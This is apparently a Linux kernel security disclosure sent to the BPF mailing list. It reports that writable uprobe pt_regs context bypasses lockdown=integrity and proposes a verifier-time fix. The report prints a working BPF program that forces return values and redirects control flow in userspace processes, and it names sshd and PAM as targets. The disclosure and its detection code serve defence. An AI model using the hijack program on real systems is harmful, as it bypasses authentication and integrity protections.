* BPF: writable uprobe pt_regs context bypasses lockdown=integrity
@ 2026-04-27 12:39 Xavier Brouckaert (xabrouck)
  2026-04-27 13:42 ` Greg KH
                   ` (3 more replies)
  0 siblings, 4 replies; 7+ messages in thread
From: Xavier Brouckaert (xabrouck) @ 2026-04-27 12:39 UTC (permalink / raw)
  To: bpf@vger.kernel.org; +Cc: security@kernel.org



Summary
-------
Kernels that permit BPF_PROG_TYPE_KPROBE programs attached as uprobes to
store to their pt_regs context allow a CAP_BPF+CAP_PERFMON (or root)
user to redirect control flow (set ip/sp/any GPR) in arbitrary userspace
processes. This is not gated by the lockdown LSM: under
lockdown=integrity, bpf_probe_write_user() is correctly refused via
LOCKDOWN_BPF_WRITE_USER, but the strictly more powerful direct-ctx-store
path is not, because lockdown's BPF hooks are implemented per-helper and
this primitive uses no helper.

Net effect: on a lockdown=integrity system, root can hijack execution in
sshd, libpam, signature verifiers, etc., with no ptrace, no text
modification on disk, and no helper that lockdown currently inspects.
This appears to violate the integrity-mode guarantee in the same way
that motivated LOCKDOWN_BPF_WRITE_USER.

Affected
--------
Reproduced on:
  - torvalds/master at dd6c438c3 ("Merge tag 'vfs-7.1-rc1.fixes'"),
    built and booted as 7.0.0+ (x86_64, lockdown=integrity) -- full PoC
    succeeds, transcript below.
  - 6.18.5 (Debian/Kali 6.18.5-1kali1, x86_64).

Relevant code in master:

  kernel/trace/bpf_trace.c: kprobe_prog_is_valid_access()
    if (type == BPF_WRITE)
        prog->aux->kprobe_write_ctx = true;
    return true;
  -- no offset restriction (ip/sp permitted), no security_locked_down().

  kernel/events/core.c: perf_event_set_bpf_prog()
    /* Writing to context allowed only for uprobes. */
    if (prog->aux->kprobe_write_ctx && !is_uprobe)
        return -EINVAL;
  -- restricts to uprobe attach, no lockdown check.

  kernel/trace/bpf_trace.c: bpf_kprobe_multi_link_attach()
    if (prog->aux->kprobe_write_ctx) return -EINVAL;
  -- kprobe_multi path correctly refuses.

  kernel/bpf/syscall.c: bpf_tracing_prog_attach()
  -- freplace smuggling into kprobes was separately found and closed
     in 611fe4b79af7 ("bpf: Fix abuse of kprobe_write_ctx via
     freplace", 2026-03-31). The lockdown interaction was not
     addressed in that series.

So the feature is deliberately fenced to uprobes (kernel pt_regs are
protected), but nothing in the load or attach path consults
security_locked_down(). LOCKDOWN_BPF_WRITE_USER is checked only in
bpf_tracing_func_proto() for the bpf_probe_write_user helper.

Introduced in 7384893d970e ("bpf: Allow uprobe program to change
context registers", Jiri Olsa, 2025-09-16) and 4363264111e1 ("uprobe:
Do not emulate/sstep original instruction when ip is changed"), merged
for v6.18 via ae28ed4578e6. So the affected range is v6.18 .. current.

The feature is consumed in the wild by Cilium Tetragon's
`action: Override` / `argRegs` mechanism (see
pkg/bpf/detect_linux.go:HasUprobeRegsChange() and
pkg/selectors/kernel_regs_amd64.go in the tetragon tree), which is how
I encountered it.

Reproduction
------------
1. Enable lockdown:

     # echo integrity > /sys/kernel/security/lockdown
     # cat /sys/kernel/security/lockdown
     none [integrity] confidentiality

2. Positive control -- confirm that a program calling
   bpf_probe_write_user() is refused:

     # dmesg | tail
     Lockdown: ...: use of bpf to write user RAM is restricted;
       see man kernel_lockdown.7

3. Build and run the attached PoC (victim.c, regwrite.bpf.c,
   regwrite.c, Makefile -- standard libbpf skeleton):

     $ ./victim wrong          # prints "denied" once per second
     # ./regwrite ./victim check_password

   Observed: verifier accepts the program; uprobe attaches; victim
   output flips from "denied" to "AUTH OK" with no restart. Detach
   (^C) reverts cleanly. No lockdown denial is logged.

   Transcript from torvalds/master @ dd6c438c3:

     $ uname -a && cat /sys/kernel/security/lockdown && ./victim wrong
     Linux ... 7.0.0+ #2 SMP PREEMPT_DYNAMIC Fri Apr 24 05:27:53 EDT 2026 x86_64 GNU/Linux
     none [integrity] confidentiality
     denied
     denied
     AUTH OK          <-- regwrite attached here
     AUTH OK
     AUTH OK
     denied           <-- regwrite ^C detached here
     denied

     # ./regwrite ./victim check_password
     ...
     libbpf: prog 'hijack': relo #1: <byte_off> [2] struct pt_regs.ax (0:10 @ offset 80)
     libbpf: prog 'hijack': relo #2: <byte_off> [2] struct pt_regs.ip (0:16 @ offset 128)
     libbpf: prog 'hijack': relo #3: <byte_off> [2] struct pt_regs.sp (0:19 @ offset 152)
     ...
     libbpf: elf: symbol address match for 'check_password' in './victim': 0x1159
     [+] attached to ./victim:check_password - hook is live in ALL pids.
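
For scripting step 1, the active mode is the bracketed token in
/sys/kernel/security/lockdown. A minimal C sketch of extracting it
follows; lockdown_active_mode() is a hypothetical helper name and is
not part of the attached PoC.

```c
#include <stddef.h>
#include <string.h>

/*
 * Copy the bracketed (active) mode out of a lockdown status line such as
 * "none [integrity] confidentiality". Hypothetical helper, for illustration.
 * Returns 0 on success, -1 if there is no "[mode]" token or it does not
 * fit in 'out'.
 */
static int lockdown_active_mode(const char *line, char *out, size_t outlen)
{
    const char *open = strchr(line, '[');
    const char *close = open ? strchr(open, ']') : NULL;
    size_t len;

    if (!open || !close)
        return -1;

    len = (size_t)(close - open - 1);
    if (len == 0 || len >= outlen)
        return -1;

    memcpy(out, open + 1, len);
    out[len] = '\0';
    return 0;
}
```

Given the line shown in step 1, the helper yields "integrity"; a test
harness could read the file with fgets() and skip the run unless that
is the result.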

The relevant BPF program body is one bpf_probe_read_user() call to fetch
the return address, followed by three context stores:

    SEC("uprobe")
    int BPF_UPROBE(hijack)
    {
        struct pt_regs *r = (struct pt_regs *)ctx;
        __u64 rsp = PT_REGS_SP(r), ra = 0;
        bpf_probe_read_user(&ra, sizeof(ra), (void *)rsp);
        r->ax = 1;          /* forced return value      */
        r->ip = ra;         /* jump to caller           */
        r->sp = rsp + 8;    /* pop the return address   */
        return 0;
    }
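
The net effect of those stores is an immediate "ret" with a forced
return value. A userspace toy model of that reasoning is sketched
below, assuming the uprobe fires at function entry on x86_64 (before
any prologue), so the word at [rsp] is the caller's return address.
All toy_* names are hypothetical and only model the register
arithmetic; nothing here touches BPF or a real process.

```c
#include <stddef.h>
#include <stdint.h>

/* Toy stand-in for the three x86_64 pt_regs fields the PoC writes. */
struct toy_regs {
    uint64_t ax;
    uint64_t ip;
    uint64_t sp;
};

/* Toy user stack: 'base' is the address of words[0]; each word is 8 bytes. */
struct toy_stack {
    uint64_t base;
    const uint64_t *words;
    size_t nwords;
};

/* Models the user-memory read: 0 on success, -1 if addr is not a mapped word. */
static int toy_read_u64(const struct toy_stack *s, uint64_t addr, uint64_t *out)
{
    size_t idx;

    if (addr < s->base || (addr - s->base) % 8 != 0)
        return -1;
    idx = (size_t)((addr - s->base) / 8);
    if (idx >= s->nwords)
        return -1;
    *out = s->words[idx];
    return 0;
}

/*
 * Same three stores as the PoC. Unlike the PoC, which ignores the read
 * helper's return value, this model leaves the registers untouched when
 * the read fails.
 */
static int toy_hijack(struct toy_regs *r, const struct toy_stack *s)
{
    uint64_t rsp = r->sp, ra = 0;

    if (toy_read_u64(s, rsp, &ra) < 0)
        return -1;
    r->ax = 1;        /* forced return value    */
    r->ip = ra;       /* resume in the caller   */
    r->sp = rsp + 8;  /* pop the return address */
    return 0;
}
```

With sp pointing at a stack word holding the return address, the model
ends with ip equal to that address, sp advanced by 8 and ax set to 1:
the probed function body never executes.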

Impact
------
Under lockdown=integrity, root retains the ability to:
  - force arbitrary return values from any userspace function
    (auth checks, signature verification, policy decisions);
  - redirect rip to arbitrary mapped text (ROP/JOP entry);
  - do so with no ptrace, no PTRACE_POKETEXT, no /proc/pid/mem,
    no bpf_probe_write_user, no persistent .text modification.

The only userspace-visible artefact while the probe is armed is a
4 KiB Anonymous/Private_Dirty page in the target's r-xp VMA
(uprobe's CoW for the int3); this reverts to zero on detach via the
__replace_page(NULL) path in uprobe_write_opcode(), so it is a
presence signal only.
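
A monitoring tool could look for that presence signal by scanning
/proc/<pid>/smaps. The sketch below is a minimal illustration, assuming
the usual smaps layout (a VMA header line followed by "Field: N kB"
lines); count_dirty_text_vmas() is a hypothetical name. Other CoW
writers to text pages, such as a debugger's software breakpoints, would
presumably produce the same signal, so a hit is a hint rather than
proof of a uprobe.

```c
#include <stdio.h>
#include <string.h>

/*
 * Count "r-xp" VMAs in smaps-format text that report a non-zero
 * Private_Dirty value. 'smaps' is any readable stream in that format,
 * e.g. fopen("/proc/<pid>/smaps", "r").
 */
static int count_dirty_text_vmas(FILE *smaps)
{
    char line[512], perms[5];
    unsigned long start, end, kb;
    int in_text = 0, hits = 0;

    while (fgets(line, sizeof(line), smaps)) {
        /* A VMA header looks like "start-end perms offset dev inode path". */
        if (sscanf(line, "%lx-%lx %4s", &start, &end, perms) == 3) {
            in_text = strcmp(perms, "r-xp") == 0;
            continue;
        }
        if (in_text &&
            sscanf(line, "Private_Dirty: %lu kB", &kb) == 1 && kb > 0) {
            hits++;
            in_text = 0;  /* count each VMA at most once */
        }
    }
    return hits;
}
```

Since the page is restored on detach, polling like this can only catch
a probe while it is armed.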

This is strictly more capable than bpf_probe_write_user (which can
corrupt data but not directly set ip), and is reached with the same
privilege, yet only the weaker primitive is lockdown-gated.

Suggested fix
-------------
Gate writable kprobe/uprobe context behind security_locked_down() at
the point the verifier permits the store. Two reasonable shapes:

(a) In kprobe_prog_is_valid_access() (kernel/trace/bpf_trace.c),
    when type == BPF_WRITE, call
    security_locked_down(LOCKDOWN_BPF_WRITE_USER) and return false
    if denied. This reuses the existing reason and matches the
    intent ("BPF writing to user state"). One line, adjacent to the
    kprobe_write_ctx flag set.

(b) Introduce a dedicated LOCKDOWN_BPF_WRITE_REGS reason in the
    integrity tier (i.e. listed before LOCKDOWN_INTEGRITY_MAX), for
    clearer audit messages, and check it in the same place.

Either way the check belongs at verify/load time rather than attach
time, so the program is refused outright rather than attaching as a
no-op.
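
The control flow of option (a) can be modelled in userspace as below.
This is a sketch, not a kernel patch: every toy_* name is a
hypothetical stand-in, toy_locked_down_bpf_write_user() models
security_locked_down(LOCKDOWN_BPF_WRITE_USER) returning a negative
value on denial, and the bounds checks are generic placeholders rather
than a copy of the kernel's.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

enum toy_access { TOY_READ, TOY_WRITE };

/* Stand-in for x86_64 struct pt_regs: 21 eight-byte slots (168 bytes). */
struct toy_pt_regs { uint64_t slot[21]; };

/* Stand-in for prog->aux; only the flag discussed in this report. */
struct toy_prog { bool kprobe_write_ctx; };

/* Models the lockdown state: true means lockdown=integrity or stricter. */
static bool toy_lockdown_integrity;

/* Models security_locked_down(LOCKDOWN_BPF_WRITE_USER): 0 = allowed. */
static int toy_locked_down_bpf_write_user(void)
{
    return toy_lockdown_integrity ? -1 : 0;
}

/* Models kprobe_prog_is_valid_access() with the proposed gate added. */
static bool toy_kprobe_is_valid_access(int off, int size,
                                       enum toy_access type,
                                       struct toy_prog *prog)
{
    /* Placeholder sanity checks: in bounds and naturally aligned. */
    if (off < 0 || size <= 0 || off % size != 0)
        return false;
    if ((size_t)off + (size_t)size > sizeof(struct toy_pt_regs))
        return false;

    if (type == TOY_WRITE) {
        /* Proposed gate: refuse the store at verification time. */
        if (toy_locked_down_bpf_write_user() < 0)
            return false;
        prog->kprobe_write_ctx = true;
    }
    return true;
}
```

In this model a write to offset 128 (pt_regs.ip in the relocation log
above) is accepted with lockdown off and rejected with it on, while
reads stay permitted in both cases.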

Orthogonally, a CONFIG_BPF_UPROBE_OVERRIDE knob (mirroring
CONFIG_BPF_KPROBE_OVERRIDE for bpf_override_return) would let
distributions opt out independent of lockdown.

thanks,
X.


[-- Attachment #2: regwrite-poc.tar.gz --]
[-- Type: application/x-gzip, Size: 3697 bytes --]


Thread overview (7+ messages):
2026-04-27 12:39 BPF: writable uprobe pt_regs context bypasses lockdown=integrity Xavier Brouckaert (xabrouck)
2026-04-27 13:42 ` Greg KH
2026-04-27 13:43 ` Greg KH
2026-04-27 14:09 ` Jiri Olsa
2026-04-27 14:16   ` Alexei Starovoitov
2026-04-27 14:25 ` Nicolas Bouchinet
2026-04-27 14:56   ` Daniel Borkmann
